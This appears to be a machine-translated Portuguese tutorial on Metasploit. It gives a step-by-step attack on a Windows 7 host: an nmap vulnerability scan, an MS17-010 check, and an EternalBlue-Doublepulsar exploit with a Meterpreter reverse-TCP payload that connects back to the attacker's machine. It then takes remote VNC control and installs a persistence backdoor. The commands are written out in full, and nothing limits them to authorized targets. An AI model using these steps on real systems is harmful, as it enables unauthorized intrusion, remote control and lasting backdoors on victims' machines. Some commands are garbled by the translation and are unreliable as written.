Como discutimos a melhor ferramenta do melhor Kali Linux, e colocamos o metasploit no começo da lista, agora vamos discutir e aprender sobre o metasploit. Recomendamos que você esteja familiarizado com o metasploit.
Metasploit inicialmente criado por H. D Moore em 2003, até que foi adquirido e desenvolvido mais adiante pelo Rapid7 em 21 de outubro de 2009. O Metasploit-Framework é completamente escrito usando Ruby e é um pacote padrão instalado no sistema Kali Linux (e também quase todo o sistema operacional de teste de penetração, eu acho). É um kit favorito de hackers ou testadores de penetração para pesquisar vulnerabilidades de segurança, desenvolver e executar explorações em alvos e outro desenvolvimento de segurança.
A metasploit vem com várias edições, geralmente divididas em duas categorias, versão gratuita e versão paga. As versões gratuitas: Metasploit Framework Community Edition (interface baseada em CLI) e Armitage (interface baseada na GUI). As versões pagas: Metasploit Express, Metasploit Pro e Cobalt Strike (é semelhante com Armitage, que é fornecido pela Strategic Cyber LLC).
A metasploit permite que os usuários criem (ou desenvolvam) seu próprio código de exploração, mas não se preocupe se você não souber como codificar, o metasploit tem tantos módulos e eles são atualizados continuamente. Atualmente, a metasploit tem mais de 1600 explorações e 500 cargas úteis. A maneira simples de entender o que são explorações e cargas úteis, uma exploração é basicamente como o invasor entrega a carga útil, através do orifício de vulnerabilidade do sistema de destino. Uma vez que o invasor lança a exploração que contém uma carga útil contra o alvo vulnerável, a carga útil implantada (carga útil usada para se conectar de volta ao invasor para obter acesso remoto contra o sistema de destino), nesta fase, a exploração é feita e se torna irrelevante.
“O metasploit não está hackeando a ferramenta instantânea, é uma estrutura insana”
Este artigo de metasploit é sobre a realização de testes de penetração contra um sistema de destino usando o seguinte fluxo:
PREPARAÇÃO
Verifique se o nosso Kali Linux tem a versão mais recente atualizada. Haverá melhorias em cada atualização. Execute os seguintes comandos:
~# atualização apt
~# apt upgrade -y
~# apt dist upgrade -y
Uma vez que nossa máquina estiver atualizada, agora vamos começar disparando o console de metasploit. No terminal, tipo:
~# msfconsole
E também você precisa de qualquer editor de texto, Gedit ou Leafpad, para coletar algumas informações ao longo do caminho antes de compilar o ataque. Em primeiro lugar, identifique seu endereço IP da interface sem fio, o IP do roteador e a máscara de rede.
Com base nas informações acima, observamos o endereço IP WLAN1 e o roteador e a máscara de rede. Então, a nota deve ficar assim:
IP do atacante (LHOST): 192.168.1.56
Gateway / IP do roteador: 192.168.1.1
Máscara de rede: 255.255.255.0 (/24)
Etapa 1: varredura de vulnerabilidade
No console de metasploit, primeiro reunimos informações, como endereço IP de destino, sistema operacional, portas abertas e a vulnerabilidade. A metasploit nos permite executar o NMAP diretamente do console. Com base nas informações acima executam este comando para realizar nossa tarefa de coleta de informações.
msf> nmap -v 192.168.1.1/24 -Script Vuln -pn -o |
Do comando acima, obtivemos o resultado abaixo.
Temos um alvo vulnerável executando o sistema operacional Windows, e o vulnerável está no serviço SMBV1. Então, adicione para anotar.
IP alvo (RHOST): 192.168.1.57
Vulnerabilidade: Execução de código remoto Vulnerabilidade em servidores Microsoft SMBV1 (MS17-010)
Etapa 2: Avaliação de vulnerabilidade
Agora conhecemos o alvo e sua vulnerabilidade. Vamos verificar a vulnerabilidade no console de metasploit
Agora conhecemos o alvo e sua vulnerabilidade. Vamos verificar a vulnerabilidade no console de metasploit usando o módulo auxiliar SMB_SCANNER. Execute o seguinte comando:
msf> Use auxiliar/scanner/sMB/sMB_MS17_010
MSF auxiliar (SMB_MS17_010)> Definir rhosts [IP do destino]
MSF auxiliar (SMB_MS17_010)> Execute
A Metasploit está confiante sobre a vulnerabilidade e mostra a edição exata do Windows OS. Adicionar à nota:
Target OS: Windows 7 Ultimate 7600
Etapa 3: Explorando
Infelizmente, o Metasploit não tem módulo de exploração relacionado a essa vulnerabilidade. Mas, não se preocupe, há um cara do lado de fora exposto e escreveu o código de exploração. A exploração é familiar, pois é iniciada pela NASA é chamada EternalBlue-Doublepulsar. Você pode pegá -lo daqui, ou pode seguir o guia do vídeo do tutorial abaixo para instalar o código de exploração na sua estrutura de metasploit.
Depois de seguir o guia acima (verifique se o caminho é o mesmo que o tutorial). Agora, você está pronto para explorar o alvo. Execute os seguintes comandos:
Use explorar/windows/sMb/eternalblue_doublepulsar
Definir carga útil Windows/Meterpreter/Reverse_tcp
Definir ProcessInject Spoolsv.exe
Definir Rhost 192.168.1.57
Definir Lhost 192.168.1.56
Explorar
Boom… a exploração é bem -sucedida, obtivemos a sessão do Meterpreter. Como mencionei anteriormente, uma vez lançado o exploração, ele implantará a carga útil, que é, aqui usamos, Windows/Meterpreter/reverse_tcp.
Etapa 4: Ganhando acesso remoto
Vamos explorar os comandos mais disponíveis, digite '?'(sem ponto de interrogação) e veja comandos listados disponíveis. O Stdapi, Os comandos do sistema são:
Para ver mais informações sobre o sistema de destino, use 'SysinfoComando. A saída deve ficar assim.
Desde que injetamos no processo do sistema anterior (Spoolsv.exe), obtivemos privilégios do sistema. Nós possuímos o alvo. Podemos fazer muito com o comando para o alvo. Por exemplo, poderíamos executar o RDP ou apenas definir o Remote VNC. Para executar o serviço VNC, enter comando:
~# execute vnc
O resultado deve ser a área de trabalho da máquina de destino, é assim.
A parte mais importante é criar um backdoor; portanto, sempre que o alvo desconectado para nossa máquina, a máquina de destino tentará se conectar novamente, novamente a nós. Backdooring é usado para manter o acesso, é como pescar, você não jogará seu peixe de volta à água depois de pegar o peixe, certo? Você quer fazer algo com o peixe, seja salvá -lo na geladeira para mais ações, como cozinhar ou vendê -lo por dinheiro.
Meterpreter tem essa função de backdoor persistentemente. Execute o seguinte comando e dê uma olhada nos parâmetros e argumentos disponíveis.
Meterpreter> Execute persistência -h
Se você não estiver confortável com este script depreciado, o mais novo módulo de persistência está sob post/windows/gerencia/persistence_exe. Você pode explorar ainda mais.
O metasploit é enorme, não é apenas uma ferramenta, é uma estrutura, considere que possui mais de 1600 explorações e cerca de 500 cargas úteis. Um artigo é adequado para o quadro geral do uso geral ou ideia. Mas, você aprendeu muito com este artigo.
“Quanto mais você segue o fluxo de ataque, mais você tem um desafio sem esforço.”